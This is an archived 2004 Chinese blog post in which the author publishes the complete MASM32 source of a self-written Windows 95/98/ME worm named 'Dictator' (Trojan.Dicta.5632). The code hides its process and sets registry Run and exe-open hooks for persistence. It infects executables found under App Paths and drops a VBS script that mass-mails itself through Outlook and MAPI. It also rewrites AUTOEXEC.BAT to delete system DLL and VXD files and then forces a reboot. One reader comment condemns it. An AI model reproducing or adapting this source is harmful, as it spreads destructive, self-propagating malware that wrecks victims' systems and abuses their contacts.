我编写的病毒Trojan.Dicta.5632 :: 凌辰三点

来源: BlogBus 原始链接: http://www.blogbus.com:80/blogbus/blog/diary.php?diaryid=65730 存档链接: https://web.archive.org/web/20041029014146id_/http://www.blogbus.com:80/blogbus/blog/diary.php?diaryid=65730

凌辰三点 记录一些自己资料 <<<动态的查找Kernel32.dll的模块句柄与 GetProcAddress的API函数地址 | 首页 | 我写的病毒疫苗程序>>> 我编写的病毒Trojan.Dicta.5632 时间: 2004-01-03 我编写的病毒Trojan.Dicta.5632

编辑: 来源:EkenChan 类别:安全之难 日期:2002.02.18 今日/总浏览: 3/2086 ;============= ;INSTRUCTIONS: ;======================= ;WormName: Dictator ;Author: Eken Chan ;Version: Alpha 1.0 ;Infect: .EXE ;Kill: .DLL .VXD ;Assembler: MASM32 ;Platform: Win 95/98/ME ;Size: 5,632 Bytes ;======================= .386 .model flat,stdcall include d:\masm32\include\kernel32.inc includelib d:\masm32\lib\kernel32.lib HeaderSize=200h CodeSize=1200h DataSize=200h VirusSize=HeaderSize+CodeSize+DataSize .code assume fs:@code start: call GetVersion cmp eax,80000000h ;is the system Windows 2000/NT? jb quit ;yes, let's quit push offset Kdll ;"KERNEL32.DLL" call GetModuleHandleA or eax,eax jz quit ;if failure, quit mov ebx,eax ;ebx=eax=handle to KERNEL32.DLL call GetMainFuncs push offset err lea eax,[esp-4h] xchg eax,fs:[0] push eax ;SEH call a_GetCommandLineA mov edi,eax ;edi->command line mov al,22h ;al='"' mov ecx,0ffffffffh cld ;DF=0 repnz scasb ;search for '"' not ecx cmp ecx,1 je continue push 5h ;SW_SHOW push edi ;edi->the real command line call GetStringLength mov ecx,eax ;ecx=length of the real command line dec eax add edi,eax ;edi->end of command line mov al,22h ;al='"' std ;DF=1 repnz scasb ;search for '"' inc edi mov byte ptr [edi],20h ;change '"' to ' ' call a_WinExec continue: push offset Mutex ;mutex name push 0 ;bInitialOwner=FALSE push 0 ;lpMutexAttributes=NULL call CreateMutexA or eax,eax jnz go_on ;if eax=handle to mutex, that means my worm hasn't run yet! call GetLastError cmp eax,183 ;ERROR_ALREADY_EXISTS? je err go_on: push 1 push 0 call a_RegisterServiceProcess;hide my worm in the task list mov ebx,offset FileName push 100h push ebx push 0 call a_GetModuleFileNameA ;ebx->the full path of my worm push 100h push offset WinDir call a_GetWindowsDirectoryA push 100h push offset SysDir call a_GetSystemDirectoryA mov esi,offset WinDir mov edi,offset List again: push edi push esi call lstrcat push esi push ebx call lstrcmpi or eax,eax jz skip push 1 ;bFailIfExists=TRUE push esi ;lpNewFileName push ebx ;lpExistingFileName call a_CopyFileA skip: call GetStringLength add edi,eax cmp byte ptr [edi],0 je done add esi,100h jmp again done: mov edi,offset Funcs@A mov esi,offset a_RegCloseKey push offset Adll ;"ADVAPI32.DLL" call a_LoadLibraryA or eax,eax jz trigger ;fail to load dll, my worm triggers call GetAPIs ;get the func addresses in ADVAPI32.DLL sub esp,8 ;space for local vars push esp ;phKey push 0f003fh ;KKEY_ALL_ACCESS push 0 ;reserved push offset Key_Run ;lpSubKey push 80000002h ;HKEY_LOCAL_MACHINE call a_RegOpenKeyExA mov ebx,[esp] ;ebx=hKey push 11 ;data size push offset List+12 ;"Dict32.exe" push 1 ;REG_SZ push 0 ;reserved push offset Mutex ;value name push ebx ;hKey call a_RegSetValueExA call a_RegCloseKey push esp ;phKey push 0f003fh ;KEY_ALL_ACCESS push 0 ;reserved push offset Key_Exe ;lpSubKey push 80000002h ;HKEY_LOCAL_MACHINE call a_RegOpenKeyExA mov ebx,[esp] ;ebx=hKey push offset Value push offset WinDir call lstrcat mov edi,offset WinDir call GetStringLength push eax ;data size push edi ;"%Windows%\Dictt.exe "%1" %" push 1 ;REG_SZ push 0 ;reserved push 0 ;default value push ebx ;hKey call a_RegSetValueExA call a_RegCloseKey push 0 ;hTemplateFile=NULL push 6h ;FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM push 2h ;CREATE_ALWAYS push 0 ;LPSECURITY_ATTRIBUTES=NULL push 0 ;the share mode is 0 push 40000000h ;GENERIC_WRITE push offset vbsFile ;"C:\Dicta.vbs" call a_CreateFileA cmp eax,-1 je trigger ;fail to create, then trigger mov ebx,eax ;ebx=hFile push 0 ;lpOverlapped=NULL lea eax,[esp-1ch] push eax ;lpNumberOfBytesWritten push vbsSize ;number of bytes to write push offset Dicta_vbs ;data buffer push ebx ;handle call a_WriteFile push ebx call a_CloseHandle push offset Wdll call a_LoadLibraryA or eax,eax jz trigger ;fail to load dll, trigger push offset Funcs@W push eax call a_GetProcAddress mov a_InternetGetConnectedState,eax ;save the address keep_working: call Infect push 0 lea eax,[esp-0eh] push eax call a_InternetGetConnectedState or eax,eax jz check_time push 5h push offset vbsFile call a_WinExec check_time: call GetTickCount cmp eax,36000000 jae trigger push 60000 call a_Sleep jmp keep_working trigger: push 0 push 20h push 3h push 0 push 0 push 40000000h push offset Autoexec call a_CreateFileA cmp eax,-1 je reboot mov ebx,eax push 2h push 0 push 0 push ebx call a_SetFilePointer push 0 lea eax,[esp-1ch] push eax push CmdLinesSize push offset CmdLines push ebx call a_WriteFile push ebx call a_CloseHandle reboot: push 5h push offset Rebootit call a_WinExec err: pop dword ptr fs:[0] add esp,4 quit: push 0 call ExitProcess new_thread: push ebp call @0 @0: pop ebp exit@0=exit-@0 lea eax,exit@0[ebp] push eax lea eax,[esp-4h] xchg eax,fs:[0] push eax ;SEH Mutex@0=Mutex-@0 lea eax,Mutex@0[ebp] push eax push 0 push 0 dw 95ffh dd a_CreateMutexA-@0 ;call a_CreateMutexA-@0[ebp ] mov esi,eax or eax,eax jnz copy dw 95ffh dd a_GetLastError-@0 ;call a_GetLastError-@0[ebp ] cmp eax,183 je exit copy: SysDir@0=SysDir-@0 lea edi,SysDir@0[ebp] push 0 push 20h push 2h push 0 push 0 push 0c0000000h push edi dw 95ffh dd a_CreateFileA-@0 ;call a_CreateFileA-@0[ebp ] cmp eax,-1 je exit mov ebx,eax push 0 lea eax,[esp-1ch] push eax push VirusSize start@0HeaderSize=start-@0-HeaderSize lea eax,start@0HeaderSize[ebp] push eax push ebx dw 95ffh dd a_WriteFile-@0 ;call a_WriteFile-@0[ebp ] push ebx dw 95ffh dd a_CloseHandle-@0 ;call a_CloseHandle-@0[ebp ] push esi dw 95ffh dd a_CloseHandle-@0 ;call a_CloseHandle-@0[ebp ] push 5h push edi dw 95ffh dd a_WinExec-@0 ;call a_WinExec-@0[ebp ] exit: pop dword ptr fs:[0] add esp,4 pop ebp db 68h EntryPoint dd ? ret ;------------------------------------------ ;parameters: ebx=eax=handle to KERNEL32.DLL ;returns: addresses of GetProcAddress ; WinExec ;------------------------------------------ GetMainFuncs proc push ebp push offset return lea edi,[esp-4h] xchg edi,fs:[0] push edi ;SEH add eax,[eax+3ch] mov eax,[eax+78h] add eax,ebx ;eax->IMAGE_EXPORT_DIRECTORY STRUCT mov ecx,[eax+18h] ;ecx=number of names push ecx ;save the number of names in stack mov edx,[eax+24h] add edx,ebx ;edx->name ordinals mov esi,[eax+20h] add esi,ebx ;esi->address of names mov eax,[eax+1ch] add eax,ebx ;eax->address of functions push eax ;save the address of functions in stack mov edi,offset MainFuncs ;edi->main func names mov ebp,offset APIs ;ebp->where to store the addresses of APIs next: push esi ;save esi mov esi,[esi] add esi,ebx ;esi->a function name push ecx call IsEqual or ecx,ecx pop ecx jnz unequal mov eax,[esp+8h] ;eax=number of names sub eax,ecx ;eax=ordinal in the array of name ordinals movzx eax,word ptr [edx+eax2];eax=ordinal in the array of function addresses shl eax,2 ;eax4 add eax,[esp+4h] ;eax->RVA of the function I need mov eax,[eax] ;eax=RVA of the function I need add eax,ebx ;eax=address of the function I need mov [ebp],eax ;save call GetStringLength add edi,eax ;edi->next func name add ebp,4 ;ebp->next address unequal: pop esi ;restore esi cmp byte ptr [edi],0 je finish ;it is the end of func names add esi,4 ;next loop next finish: add esp,8 return: pop dword ptr fs:[0] add esp,4 pop ebp ret GetMainFuncs endp ;------------------------------------- ;parameters: esi->a func name to check ; edi->a func name to get ;return: ecx=0(if equal) ;------------------------------------- IsEqual proc push edi ;save edi mov edi,esi ;edi=esi->a func name to check call GetStringLength pop edi ;restore edi push edi ;save edi mov ecx,eax ;ecx=length of the func name cld ;DF=0 repz cmpsb ;comparition pop edi ;restore edi ret IsEqual endp ;------------------------ ;parameter: edi->a string ;return: eax=length ;------------------------ GetStringLength proc push ecx ;save regs push edi xor al,al ;al=0 mov ecx,0ffffffffh cld ;DF=0 repnz scasb ;search for NULL not ecx mov eax,ecx ;eax=length pop edi pop ecx ret ;restore regs and return GetStringLength endp ;--------------------------------------------- ;parameters: esi->where to store the addresses ; edi->func names ; eax=handle to dll ;returns: addresses of APIs ;--------------------------------------------- GetAPIs proc mov ebx,eax ;ebx=handle to dll loopit: push edi push ebx call a_GetProcAddress mov [esi],eax call GetStringLength add edi,eax ;edi->next func name add esi,4 ;esi=next address cmp byte ptr [edi],0 ;is the end of func names? jne loopit ;no, go on ret GetAPIs endp ;--------------- ;parameter: none ;return: none ;--------------- Infect proc push ebp sub esp,4 push esp ;phKey push 0f003fh ;KEY_ALL_ACCESS push 0 ;reserved lea eax,Key_App push eax ;lpSubKey push 80000002h ;HKEY_LOCAL_MACHINE call a_RegOpenKeyExA pop ebx ;ebx=hKey or eax,eax jnz FailToInfect sub esp,100h mov esi,esp sub esp,100h mov edi,esp sub esp,4 xor ebp,ebp more: push 100h push esi push ebp push ebx call a_RegEnumKeyA or eax,eax jnz FailToEnum mov dword ptr [esp],100h push esp push edi push esi push ebx call a_RegQueryValueA or eax,eax jnz FailToQuery cmp dword ptr [esp],1 jna FailToQuery call _Infect FailToQuery: inc ebp jmp more FailToEnum: push ebx call a_RegCloseKey FailToInfect: add esp,204h pop ebp ret Infect endp ;--------------------------- ;parameter: edi->a file name ;return: none ;--------------------------- _Infect proc pushad push 0 ;hTemplateFile=NULL push 27h ;FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM push 3h ;OPEN_EXISTING push 0 ;LPSECURITY_ATTRIBUTES=NULL push 0 ;share mode is 0 push 0c0000000h ;GENERIC_READ|GENERIC_WRITE push edi ;file name call a_CreateFileA cmp eax,-1 je FailToOpen mov ebx,eax mov ebp,esp sub esp,18h lea eax,[ebp-8h] push eax lea eax,[ebp-10h] push eax lea eax,[ebp-18h] push eax push ebx call a_GetFileTime push 0 push ebx call a_GetFileSize mov edi,eax add eax,VirusSize push eax push 0 push eax push 0 push 4h push 0 push ebx call a_CreateFileMappingA pop ecx push ebx cmp eax,-1 je FailToMap mov ebx,eax push ecx push 0 push 0 push 0f001fh push ebx call a_MapViewOfFile push ebx or eax,eax jz FailToView push eax add edi,eax add eax,[eax+3ch] cmp byte ptr [eax+1ah],0ech ;is it a infected file? je Unmap mov ebx,eax mov byte ptr [ebx+1ah],0ech mov eax,[ebx+34h] add eax,[ebx+28h] mov EntryPoint,eax cld mov esi,00400000h mov ecx,HeaderSize/4 rep movsd mov esi,00401000h mov ecx,CodeSize/4 rep movsd mov esi,00403000h mov ecx,DataSize/4 rep movsd movzx edi,word ptr [ebx+14h] add edi,ebx add edi,18h mov cx,[ebx+6h] dec cx mov eax,28h mul cx add edi,eax mov eax,[edi+0ch] add eax,[edi+10h] add eax,HeaderSize+new_thread-start mov [ebx+28h],eax add dword ptr [edi+10h],VirusSize push dword ptr [edi+10h] pop dword ptr [edi+8h] mov dword ptr [edi+24h],0e000000eh Unmap: call a_UnmapViewOfFile FailToView: call a_CloseHandle pop ebx lea eax,[ebp-8h] push eax lea eax,[ebp-10h] push eax lea eax,[ebp-18h] push eax push ebx call a_SetFileTime push ebx FailToMap: call a_CloseHandle xchg ebp,esp FailToOpen: popad ret _Infect endp Data: Mutex db 'Dictator',0 List db '\Dictt.exe',0 db '\Dict32.exe',0 db 0 WinDir db 100h dup(?) SysDir db 100h dup(?) FileName db 100h dup(?) Autoexec db 'AUTOEXEC.BAT',0 CmdLines db '@del %WINDIR%\SYSTEM*.DLL',0dh,0ah db '@del %WINDIR%\SYSTEM*.VXD',0dh,0ah CmdLinesSize=$-CmdLines Rebootit db 'Rundll32.exe %WINDIR%\SYSTEM\shell32.dll,SHExitWindowsEx 6',0 Kdll db 'KERNEL32.DLL',0 Adll db 'ADVAPI32.DLL',0 Wdll db 'WININET.DLL',0 Value db ' "%1" %*',0 Key_Run db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0 Key_Exe db 'SOFTWARE\CLASSES\exefile\shell\open\command',0 Key_App db 'SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths',0 vbsFile db 'C:\Dicta.vbs',0 Dicta_vbs db 'On Error Resume Next',0dh,0ah db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set sysdir=fso.GetSpecialFolder(1)',0dh,0ah db 'Set out=CreateObject("Outlook.Application")',0dh,0ah db 'Set mail=out.CreateItem(0)',0dh,0ah db 'mail.Subject="IMissYou"',0dh,0ah db 'mail.Body="I cannot help missing you!"',0dh,0ah db 'mail.Attachments.Add(sysdir&"\Dict32.exe")',0dh,0ah db 'Set a=out.GetNameSpace("MAPI").AddressLists',0dh,0ah db 'For Each a1 In a',0dh,0ah db 'n=al.AddressEntries.Count',0dh,0ah db 'If n<>0 Then',0dh,0ah db 'For i=1 To n',0dh,0ah db 'mail.Recipients.Add(a1.AddressEntries(i))',0dh,0ah db 'Next',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'mail.Send',0dh,0ah db 'Dim m()',0dh,0ah db 'Set MS=CreateObject("MSMAPI.MAPISession")',0dh,0ah db 'Set MM=CreateObject("MSMAPI.MAPIMessages")',0dh,0ah db 'MS.DownLoadMail=False',0dh,0ah db 'MS.NewSession=False',0dh,0ah db 'MS.LogonUI=True',0dh,0ah db 'MS.SignOn',0dh,0ah db 'MM.SessionID=MS.SessionID',0dh,0ah db 'MM.FetchSorted=True',0dh,0ah db 'MM.Fetch',0dh,0ah db 'n=MM.MsgCount-1',0dh,0ah db 'ReDim m(n)',0dh,0ah db 'For i=0 To n',0dh,0ah db 'MM.MsgIndex=i',0dh,0ah db 'm(i)=MM.MsgOrigAddress',0dh,0ah db 'Next',0dh,0ah db 'For Each ma In m',0dh,0ah db 'If IsMail(ma) Then',0dh,0ah db 'MM.Compose',0dh,0ah db 'MM.MsgSubject="IMissYou"',0dh,0ah db 'MM.RecipAddress=ma',0dh,0ah db 'MM.MsgNoteText="I cannot help missing you!"',0dh,0ah db 'MM.AttachmentPathName=sysdir&"\Dict32.exe"',0dh,0ah db 'MM.Send',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'MS.SignOff',0dh,0ah db 'Sub IsMail(S)',0dh,0ah db 'IsMail=False',0dh,0ah db 'm1=InStr(S, "@")',0dh,0ah db 'm2=InStr(S, ".")',0dh,0ah db 'If m1<>0 And m1<m2 Then IsMail=True',0dh,0ah db 'End Sub',0dh,0ah vbsSize=$-Dicta_vbs MainFuncs db 'CloseHandle',0 db 'CopyFileA',0 db 'CreateFileA',0 db 'CreateFileMappingA',0 db 'CreateMutexA',0 db 'GetCommandLineA',0 db 'GetFileSize',0 db 'GetFileTime',0 db 'GetLastError',0 db 'GetModuleFileNameA',0 db 'GetProcAddress',0 db 'GetSystemDirectoryA',0 db 'GetWindowsDirectoryA',0 db 'LoadLibraryA',0 db 'MapViewOfFile',0 db 'RegisterServiceProcess',0 db 'SetFilePointer',0 db 'SetFileTime',0 db 'Sleep',0 db 'UnmapViewOfFile',0 db 'WinExec',0 db 'WriteFile',0 db 0 Funcs@A db 'RegCloseKey',0 db 'RegEnumKeyA',0 db 'RegOpenKeyExA',0 db 'RegQueryValueA',0 db 'RegSetValueExA',0 db 0 Funcs@W db 'InternetGetConnectedState',0 db 0 APIs: a_CloseHandle dd ? a_CopyFileA dd ? a_CreateFileA dd ? a_CreateFileMappingA dd ? a_CreateMutexA dd ? a_GetCommandLineA dd ? a_GetFileSize dd ? a_GetFileTime dd ? a_GetLastError dd ? a_GetModuleFileNameA dd ? a_GetProcAddress dd ? a_GetSystemDirectoryA dd ? a_GetWindowsDirectoryA dd ? a_LoadLibraryA dd ? a_MapViewOfFile dd ? a_RegisterServiceProcess dd ? a_SetFilePointer dd ? a_SetFileTime dd ? a_Sleep dd ? a_UnmapViewOfFile dd ? a_WinExec dd ? a_WriteFile dd ? a_RegCloseKey dd ? a_RegEnumKeyA dd ? a_RegOpenKeyExA dd ? a_RegQueryValueA dd ? a_RegSetValueExA dd ? a_InternetGetConnectedState dd ? end start seath 发表于 2004-01-03 03:31 引用(Trackback0) | 编辑 评论 你为什么要编写病毒啊~~真可怕。就好象制造毒药杀人一样。很缺德的 问一下 ( ) 发表于 2004-06-19 18:07 发表评论 最后更新 我写的病毒疫苗程序 我编写的病毒Trojan.Dicta.5632 动态的查找Kernel32.dll的模块句柄与 GetProcAddress的API函数地址 WIN9X内核线程注入及进程不死技 SEH in ASM 研究 p2p蠕虫的代码 Elkern.C源代码 CIH1.2完全源程序 MBR加载过程 中断发生时候